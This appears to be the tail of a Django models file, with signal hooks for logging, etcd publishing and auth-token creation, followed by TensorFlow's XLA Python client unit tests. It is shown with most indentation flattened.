post_save.connect(_log_config_updated, sender=Config, dispatch_uid='api.models.log')
post_save.connect(_log_domain_added, sender=Domain, dispatch_uid='api.models.log')
post_save.connect(_log_cert_added, sender=Certificate, dispatch_uid='api.models.log')
post_delete.connect(_log_domain_removed, sender=Domain, dispatch_uid='api.models.log')
post_delete.connect(_log_cert_removed, sender=Certificate, dispatch_uid='api.models.log')
# automatically generate a new token on creation
@receiver(post_save, sender=get_user_model())
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
_etcd_client = get_etcd_client()
if _etcd_client:
post_save.connect(_etcd_publish_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_key, sender=Key, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_user, sender=get_user_model(), dispatch_uid='api.models')
post_save.connect(_etcd_publish_domains, sender=Domain, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_domains, sender=Domain, dispatch_uid='api.models')
post_save.connect(_etcd_publish_app, sender=App, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_app, sender=App, dispatch_uid='api.models')
post_save.connect(_etcd_publish_cert, sender=Certificate, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_cert, sender=Certificate, dispatch_uid='api.models')
post_save.connect(_etcd_publish_config, sender=Config, dispatch_uid='api.models')
post_delete.connect(_etcd_purge_config, sender=Config, dispatch_uid='api.models')
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
import numpy as np
from tensorflow.compiler.xla.python import xla_client
import unittest
class LocalComputationTest(unittest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
return compiled_c.ExecuteWithPythonValues(arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be stricter, so we assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self, c, arguments=(), expected=None, rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
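# Aside (plain NumPy, illustrative): the extra shape assertion in _ExecuteAndAssertWith exists
# because NumPy's closeness checks broadcast "array-like" inputs, so a bare scalar compares
# equal to a nested singleton even though the shapes differ. A minimal demonstration:
def _demo_lenient_comparison():
  np.testing.assert_allclose(4.0, [[4.0]])       # passes: 4.0 broadcasts against a (1, 1) array
  assert np.asanyarray(4.0).shape == ()          # scalar shape
  assert np.asanyarray([[4.0]]).shape == (1, 1)  # nested singleton shape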
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationsWithConstantsTest(LocalComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumF32(self):
c = self._NewComputation()
root = c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])),
c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(c.Constant(NumpyArrayS32([-2])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(c.Constant(NumpyArrayS32([-1])),
c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testGetProto(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
built = c.Build()
proto = built.GetProto() # HloModuleProto
self.assertEqual(len(proto.computations), 1)
self.assertEqual(len(proto.computations[0].instructions), 3)
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
class ParametersTest(LocalComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class LocalBufferTest(LocalComputationTest):
"""Tests focusing on execution with LocalBuffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
arg_buffers = [xla_client.LocalBuffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11)],
expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11), NumpyArrayF32(3.14)],
expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().CompileWithExampleArguments([arg])
arg_buffer = xla_client.LocalBuffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(ValueError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 0)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertEqual(len(got), 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.LocalBuffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2,))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
class SingleOpTest(LocalComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
  single XLA ops. As few additional ops as possible are added around the op
  being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.xla_data_pb2.PRED,
np.int32: xla_client.xla_data_pb2.S32,
np.int64: xla_client.xla_data_pb2.S64,
np.float32: xla_client.xla_data_pb2.F32,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.xla_data_pb2.S32,
np.float32: xla_client.xla_data_pb2.F32,
}
xla_x64_types = {
np.int64: xla_client.xla_data_pb2.S64,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
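    # dimension_numbers is ((lhs_contracting_dims, rhs_contracting_dims),
    # (lhs_batch_dims, rhs_batch_dims)): contract lhs dim 2 with rhs dim 1 and
    # batch over dim 0 of both, i.e. a batched matmul.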
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.xla_data_pb2.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[1, 1], xla_client.PaddingType.SAME)
result = np.array([[[[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[2, 1], xla_client.PaddingType.VALID)
result = np.array([[[[640., 700., 760.],
[1120., 1180., 1240.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
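    # pads gives (low, high) edge padding per spatial dimension; lhs_dilation
    # of (2, 1) inserts a zero row between input rows, as in a transposed
    # convolution.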
c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(c.Constant(np.transpose(lhs, (0, 2, 3, 1))),
c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
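    # feature_group_count=2 splits the two input channels into two groups, each
    # convolved with its own single-input-channel filter from rhs.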
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]],
[[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
